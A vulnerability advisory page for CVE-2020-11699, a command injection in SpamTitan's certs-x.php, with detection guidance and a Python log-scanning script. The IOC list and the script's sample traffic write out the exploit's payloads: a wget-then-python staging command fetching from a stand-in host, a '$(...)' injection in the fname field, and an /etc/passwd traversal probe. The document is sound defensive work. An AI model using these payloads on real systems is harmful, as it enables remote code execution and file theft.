CVE-2020-11699
published 2020-09-17

Priority: P2 (63)
Severity: high, 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 9.64% (94.9th percentile)
An issue was discovered in Titan SpamTitan 7.07. Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page.

Affected (1 range)

Vendor    Product     Version range    Fixed in
titanhq   spamtitan   -                -

Detection & IOCs (extracted from sources)

path      /certs-x.php
path      /certs.php
path      /tmp/r.py
command   /usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py
command   dummy || $(oscmd)
path      ../../../..
port      4242
  • Monitor POST requests to /certs-x.php where the 'fname' parameter contains shell metacharacters such as '||', '$(...)', or pipe characters, indicating command injection attempts.
  • Detect POST requests to /certs-x.php with 'jaction=deletecert' combined with shell injection patterns in the 'fname' parameter.
  • Detect POST requests to /certs-x.php with 'jaction=downloadkey' and 'fname' values containing path traversal sequences (e.g., '../../../..') indicating arbitrary file read attempts (CVE-2020-11700).
  • Alert on outbound wget or python execution from the SpamTitan web process, particularly writing to /tmp/r.py and executing it, which is the reverse shell staging pattern used in this exploit.
  • Monitor for CSRF token extraction via GET to /certs.php followed immediately by a POST to /certs-x.php from the same session, which is the exploit's two-step attack pattern.
  • Detect inbound reverse shell connections on non-standard ports (default 4242) originating from the SpamTitan server process after exploitation.
  • Exploitation requires prior authentication to the SpamTitan web interface; unauthenticated attackers cannot directly trigger this RCE.
  • The exploit targets SpamTitan Gateway 7.07 running on FreeBSD; the hardcoded binary paths (/usr/local/bin/wget, /usr/local/bin/python) are FreeBSD-specific and may differ on other platforms.
  • Versions of SpamTitan Gateway earlier than 7.07 may also be vulnerable, as the advisory notes the issue exists in 'probably previous versions'.
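The request-side and host-side checks in the bullets above, written out as runnable detection logic. This is an added example, not code from SpamTitan, the advisory or this page: it parses POST bodies to /certs-x.php, tags fname values carrying shell metacharacters (the "dummy || $(oscmd)" shape) or ".." traversal, marks the GET /certs.php then POST /certs-x.php two-step pattern per session, and flags the wget/python staging chain when spawned under a web-server process. The records it scans are constructed for illustration and use an assumed, simplified log schema; the csrf_token field name, the web-server parent process names and the 192.0.2.10 staging host are assumptions, not values from the advisory. The metacharacter set goes slightly beyond the advisory's payload (pipes, ';', backticks and '&&' are included).

```python
"""Detection helpers for the CVE-2020-11699 exploit pattern against SpamTitan.

Added example, not code from SpamTitan, the advisory or this page.  The
request and process records below are constructed for illustration and use
an assumed, simplified log schema; the parent-process names, the csrf_token
field and the 192.0.2.10 staging host are assumptions, not advisory values.
"""
import re
from urllib.parse import parse_qs, unquote, urlencode

# Shell metacharacters worth flagging in a filename parameter.  The exploit
# payload is of the form "dummy || $(oscmd)"; pipes, ';', backticks and '&&'
# are included as the obvious generalisation beyond the advisory's payload.
SHELL_META = re.compile(r"\|\||\$\(|`|\||;|&&")
# A ".." path component, with either separator, anywhere in the value.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Host-side staging pattern from the IOC list: fetch r.py into /tmp, run it.
STAGING = re.compile(r"wget\s+\S+\s+-O\s+/tmp/r\.py|python\s+/tmp/r\.py")
# Assumed names of the processes that serve the SpamTitan web UI.
WEB_PARENTS = {"httpd", "php-fpm", "php-cgi"}


def classify_fname(fname):
    """Return the set of suspicious patterns found in an fname value."""
    decoded = unquote(fname)  # parse_qs decodes once; this catches double encoding
    tags = set()
    if SHELL_META.search(decoded):
        tags.add("shell_metachar")      # command injection (CVE-2020-11699)
    if TRAVERSAL.search(decoded):
        tags.add("path_traversal")      # arbitrary file read (CVE-2020-11700)
    return tags


def analyze_requests(requests):
    """Scan ordered (session, method, path, body) tuples and return alerts.

    Per session, remembers the previous request path so that a GET to
    /certs.php (where the exploit fetches its CSRF token) immediately
    followed by a malicious POST to /certs-x.php is tagged as the
    two-step pattern.
    """
    alerts = []
    last_path = {}
    for session, method, path, body in requests:
        if method == "POST" and path == "/certs-x.php":
            params = parse_qs(body, keep_blank_values=True)
            fname = params.get("fname", [""])[0]
            tags = classify_fname(fname)
            if tags:
                if last_path.get(session) == "/certs.php":
                    tags.add("csrf_fetch_then_post")
                alerts.append({
                    "session": session,
                    "jaction": params.get("jaction", [""])[0],
                    "fname": unquote(fname),
                    "tags": sorted(tags),
                })
        last_path[session] = path
    return alerts


def is_staging_event(parent, cmdline):
    """True if a web-server child process runs the /tmp/r.py staging chain."""
    return parent in WEB_PARENTS and STAGING.search(cmdline) is not None


# Constructed sample traffic: one exploit session, one traversal probe,
# one benign certificate deletion.  The csrf_token field name is assumed.
OSCMD = ("/usr/local/bin/wget http://192.0.2.10/r.py -O /tmp/r.py;"
         "/usr/local/bin/python /tmp/r.py")
SAMPLE_REQUESTS = [
    ("sess-A", "GET", "/certs.php", ""),
    ("sess-A", "POST", "/certs-x.php", urlencode({
        "jaction": "deletecert", "fname": "dummy || $(%s)" % OSCMD,
        "csrf_token": "0123abcd"})),
    ("sess-B", "POST", "/certs-x.php", urlencode({
        "jaction": "downloadkey", "fname": "../../../../etc/passwd"})),
    ("sess-C", "POST", "/certs-x.php", urlencode({
        "jaction": "deletecert", "fname": "mail.example.com.crt"})),
]

# Constructed process events: (parent process name, command line).
SAMPLE_PROCESSES = [
    ("httpd", "/usr/local/bin/wget http://192.0.2.10/r.py -O /tmp/r.py"),
    ("httpd", "/usr/local/bin/python /tmp/r.py"),
    ("cron", "/usr/local/bin/python /usr/local/sbin/cleanup.py"),
]

if __name__ == "__main__":
    for alert in analyze_requests(SAMPLE_REQUESTS):
        print("ALERT", alert)
    for parent, cmdline in SAMPLE_PROCESSES:
        print("STAGING" if is_staging_event(parent, cmdline) else "ok", parent, cmdline)
```

Run stand-alone it prints two alerts (the injection from sess-A, tagged with the two-step pattern, and the traversal probe from sess-B) and flags both httpd-spawned staging commands while ignoring the cron job. Because the rules key on the decoded fname rather than the raw body, percent-encoded and double-encoded payloads are caught the same way; in production the jaction value in each alert is what lets you split the deletecert (RCE) and downloadkey (file read) cases into separate rules.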

CVSS provenance

Source   Version   Score   Severity   Vector
nvd      v3.1      8.8     HIGH       CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd      v2.0      9.0     CRITICAL   AV:N/AC:L/Au:S/C:C/I:C/A:C